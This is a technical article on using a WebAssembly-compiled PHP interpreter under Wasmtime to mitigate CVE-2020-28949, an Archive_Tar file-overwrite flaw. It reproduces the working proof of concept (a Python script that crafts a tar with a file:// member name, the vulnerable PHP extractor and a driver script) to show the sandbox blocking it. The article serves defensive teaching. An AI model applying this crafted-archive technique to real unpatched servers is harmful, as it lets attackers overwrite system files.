Mitigating PHP Vulnerabilities with WebAssembly
PHP is one of the most popular server-side web programming languages and is used to build everything from simple blogs to large-scale systems. However, like any other software platform, PHP is not immune to vulnerabilities that can be exploited by malicious attackers.
In this article, we will explore how certain vulnerabilities can be mitigated by using WebAssembly (Wasm). The PHP interpreter is compiled to Wasm, and the Wasm runtime provides sandboxing capabilities, including limiting file system access in various ways. We will use a vulnerability found in the Archive_Tar library as an easy-to-exploit example.
By using Archive_Tar as a case study, we will learn how WebAssembly can provide an additional security layer that protects against different kinds of vulnerabilities, including those that are not yet public but are blocked by the same mechanisms. This applies not only to PHP but also to other programming languages. It goes without saying that the purpose of this article is not to criticize PHP or any of the other projects mentioned, but rather to show how Wasm can help protect existing applications without requiring major (or any) changes.
TL;DR:
Follow the steps below to check out the exploit for the original vulnerability and how WebAssembly can mitigate it:
- Clone the repository and generate a Docker testing image:
git clone https://github.com/vmware-labs/mod_wasm.git &&
cd mod_wasm/examples/exploit-examples/Archive_Tar &&
./run.sh
- Run the exploit:
- Original exploit:
./steps.sh
- Under WebAssembly:
./wasm_steps.sh
Archive_Tar's Vulnerability
Archive_Tar is a popular PHP library that allows the creation, extraction and manipulation of .tar files. It is used in many well-known web applications such as Drupal, a CMS that powers popular sites such as those of the European Union, NASA and Tesla. The Drupal Security Team has published several security advisories regarding Archive_Tar. In this article, we will focus on the SA-CORE-2020-013 advisory, and more specifically on its associated vulnerability CVE-2020-28949.
This critical vulnerability stems from a flaw in the filename sanitization algorithm: a malicious attacker can prefix filenames inside the .tar archive with file:// to trick the library into overwriting unintended files upon extraction. In software security jargon, this vulnerability is classified as an "injection", a category ranked #3 in the latest OWASP Top 10 report. It is due to improper neutralization or lack of verification, as explained in more detail in CWE-74.
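To make this class of bug concrete, here is a minimal Python sketch of the kind of member-name check an extractor could apply before writing anything to disk. It is not Archive_Tar's code, nor the fix that was shipped for the CVE; the helper name is_safe_member_name and the exact rules are assumptions made for illustration.

```python
import posixpath
import re

# Matches a leading URL-style scheme such as "file://" or "phar://".
_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def is_safe_member_name(name: str) -> bool:
    """Return True if an archive member name looks safe to extract.

    Hypothetical helper: rejects stream-wrapper style prefixes, absolute
    paths, and any path that climbs out of the extraction directory.
    """
    if not name or _SCHEME_RE.match(name):
        return False
    if name.startswith("/"):
        return False
    normalized = posixpath.normpath(name)
    # After normalization, a path that escapes the target starts with "..".
    return normalized != ".." and not normalized.startswith("../")


if __name__ == "__main__":
    for candidate in ("docs/readme.txt", "file:///tmp/target_file", "../../etc/passwd"):
        print(candidate, "->", is_safe_member_name(candidate))
```

A check like this only helps once it has been written and deployed, which is exactly the gap that sandboxing aims to cover for vulnerabilities nobody has reported yet.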
Exploiting the Vulnerability
For our case study, this vulnerability is very easy to exploit, and a demonstration script is available in the Archive_Tar repository. The exploit example generates a tarball archive (exploit.tar) and adds a file whose name starts with file://, followed by the path under attack (e.g., file:///etc/passwd). Then, when a PHP script (vulnerable.php) invokes Archive_Tar to extract the tarball, it will overwrite the target path.
To craft the malicious tarball archive, the exploit uses a Python script, which makes it easy to handle the fake file names. After creating the archive, the script invokes the tar.add() method to include the file specified in the first parameter (input_file.txt). The second parameter (file:///tmp/target_file) is the alternative name (arcname) stored in the archive and used on extraction, and it represents the path under attack. This is where the extraction algorithm lacks proper verification.
#!/usr/bin/python
import tarfile
tar = tarfile.open('exploit.tar', 'w')
tar.add('input_file.txt', 'file:///tmp/target_file')
tar.close()
We can inspect the resulting tarball archive by executing tar -tvf exploit.tar, and check how the target filename is set.
gzurl@dev:/exploit/file_poc$ tar -tvf exploit.tar
-rw-rw-r-- root/root 9 2020-11-14 08:19 file:///tmp/target_file
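The same inspection can be done programmatically. The sketch below builds an equivalent archive in memory and lists the stored member names without extracting anything, which shows that the tar format simply records whatever name it is given. The helper names build_tar and list_member_names are our own and are not part of the exploit repository.

```python
import io
import tarfile
from typing import List


def build_tar(member_name: str, payload: bytes) -> bytes:
    """Build an in-memory tar archive holding one member with the given name."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buffer.getvalue()


def list_member_names(archive: bytes) -> List[str]:
    """Return the stored member names without extracting anything."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        return tar.getnames()


if __name__ == "__main__":
    archive = build_tar("file:///tmp/target_file", b"whatever\n")
    print(list_member_names(archive))
```

Nothing in the archive itself is malformed; the danger only appears when an extractor hands the stored name to a file API that interprets the file:// prefix.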
The vulnerable.php script is straightforward; it includes the vulnerable version of Archive_Tar, opens the malicious tarball archive and extracts it, overwriting the original /tmp/target_file with the contents of input_file.txt.
<?php
require_once('../Archive/Tar.php');
$archive = new Archive_Tar('exploit.tar');
$archive->extract();
For convenience, the exploit provides a steps.sh script that performs these steps in sequence, including checks before and after the vulnerable.php script is invoked, plus some cleanup at the end.
#!/bin/sh
# Create a dummy file that we aim to alter
echo "test" > /tmp/target_file
# Check the contents of the file (will say 'test')
echo "cat /tmp/target_file => `cat /tmp/target_file`"
# Create our tar archive with filename specified as file:///tmp/target_file
python create_tar.py
# Call the vulnerable script that uses Archive_Tar
php vulnerable.php
# Confirm that the contents of the dummy file created above
# have been overwritten (will say 'whatever')
echo "cat /tmp/target_file => `cat /tmp/target_file`"
# Cleanup
rm exploit.tar /tmp/target_file
Executing the exploit in a vulnerable PHP environment displays the original contents of the target path /tmp/target_file, runs the exploit, and finally shows the contents again for verification. Different contents indicate that the exploit was successful.
gzurl@dev:/exploit/file_poc$ ./steps.sh
cat /tmp/target_file => test
cat /tmp/target_file => whatever
Sandboxing PHP with WebAssembly
WebAssembly provides a unique capability by sandboxing binary files and executing them at near-native speed. Its capabilities-based security model follows a deny-by-default approach, meaning no access to the outside world (file system, network, etc.) is allowed unless it is explicitly authorized. Let’s see how WebAssembly can be used to run the same vulnerable PHP script in a secure environment.
PHP is a scripting language whose interpreter is written in C. Thus, running PHP in WebAssembly means porting its interpreter into a Wasm binary. There are some challenges to this process, such as dealing with some missing features in WebAssembly (threads, signals, setjmp/longjmp, mmap, etc.). Code using these functionalities needs to be disabled or patched.
To overcome these challenges, the WebAssembly Language Runtimes project provides pre-compiled builds of popular language runtimes and third-party libraries ported to Wasm. These runtimes and libraries have been patched, tested for compatibility, and kept up to date. At the time of writing, the latest PHP Wasm build offered is 8.2.0. Here is an example of running the php-cgi --version command using Wasmtime as the WebAssembly runtime:
gzurl@dev:/exploit/file_poc$ wasmtime php-cgi-8.2.0-slim.wasm -- --version
PHP 8.2.0 (cgi-fcgi) (built: Apr 18 2023 10:20:36)
Copyright (c) The PHP Group
Zend Engine v4.2.0, Copyright (c) Zend Technologies
In a real-world scenario, the PHP Wasm binary could be used as part of a traditional LAMP stack, using an extension like mod_wasm which allows the Apache server to run WebAssembly binaries. It could also be used in a framework to build serverless applications such as Wasm Workers Server. For our purpose, we will just create a wasm_steps.sh script based on the original steps.sh from the exploit, only modifying the PHP invocation to use the Wasmtime CLI instead:
# Call the vulnerable script that uses Archive_Tar
wasmtime --mapdir /::$PWD --dir /usr/share/php php-cgi-8.2.0-slim.wasm -- -f vulnerable.php
As previously mentioned, WebAssembly provides a deny-by-default security model, so we need to explicitly provide access to concrete paths in the filesystem:
- --mapdir /::$PWD: This parameter maps the current working directory ($PWD) to the root directory seen by the WebAssembly binary, so that it can access the tarball archive for extraction. The rest of the filesystem is completely hidden and unreachable.
- --dir /usr/share/php: Since the library script Tar.php requires access to some other common scripts (e.g., PEAR.php), we also grant access to this directory.
- -- -f vulnerable.php: After the double dash, all parameters are passed directly to the WebAssembly binary. In this case, -f indicates that we are providing the input file and requesting quiet mode to suppress the HTTP header output.
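To see why the exploit can no longer reach the host's /tmp/target_file, it helps to model how a path requested by the guest relates to the directories we granted. The following Python sketch is a deliberately simplified toy model and not how Wasmtime is implemented: real runtimes work with preopened directory handles rather than string prefixes. The function resolve_guest_path and the /exploit/file_poc working directory are assumptions for illustration.

```python
import posixpath
from typing import Dict, Optional


def resolve_guest_path(guest_path: str, preopens: Dict[str, str]) -> Optional[str]:
    """Map a guest path to a host path, or None when no preopen covers it.

    Toy model of deny-by-default lookups: `preopens` maps guest directories
    to host directories, similar in spirit to --mapdir GUEST::HOST.
    """
    normalized = posixpath.normpath(guest_path)
    if not normalized.startswith("/"):
        return None
    # Prefer the longest matching guest directory.
    for guest_dir in sorted(preopens, key=len, reverse=True):
        prefix = guest_dir.rstrip("/")
        if normalized == prefix or normalized.startswith(prefix + "/"):
            relative = normalized[len(prefix):].lstrip("/")
            host_dir = preopens[guest_dir]
            return posixpath.join(host_dir, relative) if relative else host_dir
    return None


if __name__ == "__main__":
    grants = {"/": "/exploit/file_poc", "/usr/share/php": "/usr/share/php"}
    for path in ("/exploit.tar", "/usr/share/php/PEAR.php", "/tmp/target_file"):
        print(path, "->", resolve_guest_path(path, grants))
```

In this model, the guest's /tmp/target_file resolves to a location inside the working directory rather than to the host's /tmp, so the file the attacker was aiming at is simply not addressable from inside the sandbox.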
Finally, when we execute the exploit under the WebAssembly sandboxing model, the contents of the target file are not modified, and the exploit is unsuccessful. Yay!
gzurl@dev:/exploit/file_poc$ ./wasm_steps.sh
cat /tmp/target_file => test
cat /tmp/target_file => test
Conclusion
We have shown how WebAssembly can provide an additional security layer to protect existing software from different kinds of vulnerabilities, using a known and easy-to-exploit vulnerability from a popular PHP package.
The WebAssembly deny-by-default security model also lets developers and sysadmins set stricter access policies for resources, potentially enabling dynamic policies per user and per request on a production system. This represents a step forward in security for traditional web applications, where access to resources is usually set statically and often relies on the operating system configuration.
While WebAssembly can be a powerful tool in mitigating many types of vulnerabilities, it is important to note that it cannot protect against all types of attacks, such as cryptographic failures (OWASP #2) or logic, authentication, and authorization issues.
Finally, the WebAssembly capabilities demonstrated in this article are not limited to PHP. Any programming language that can be compiled to Wasm, or whose interpreter can be, could benefit from this technology. As more languages add WebAssembly support, we can expect to see even more applications and use cases leveraging its unique security features.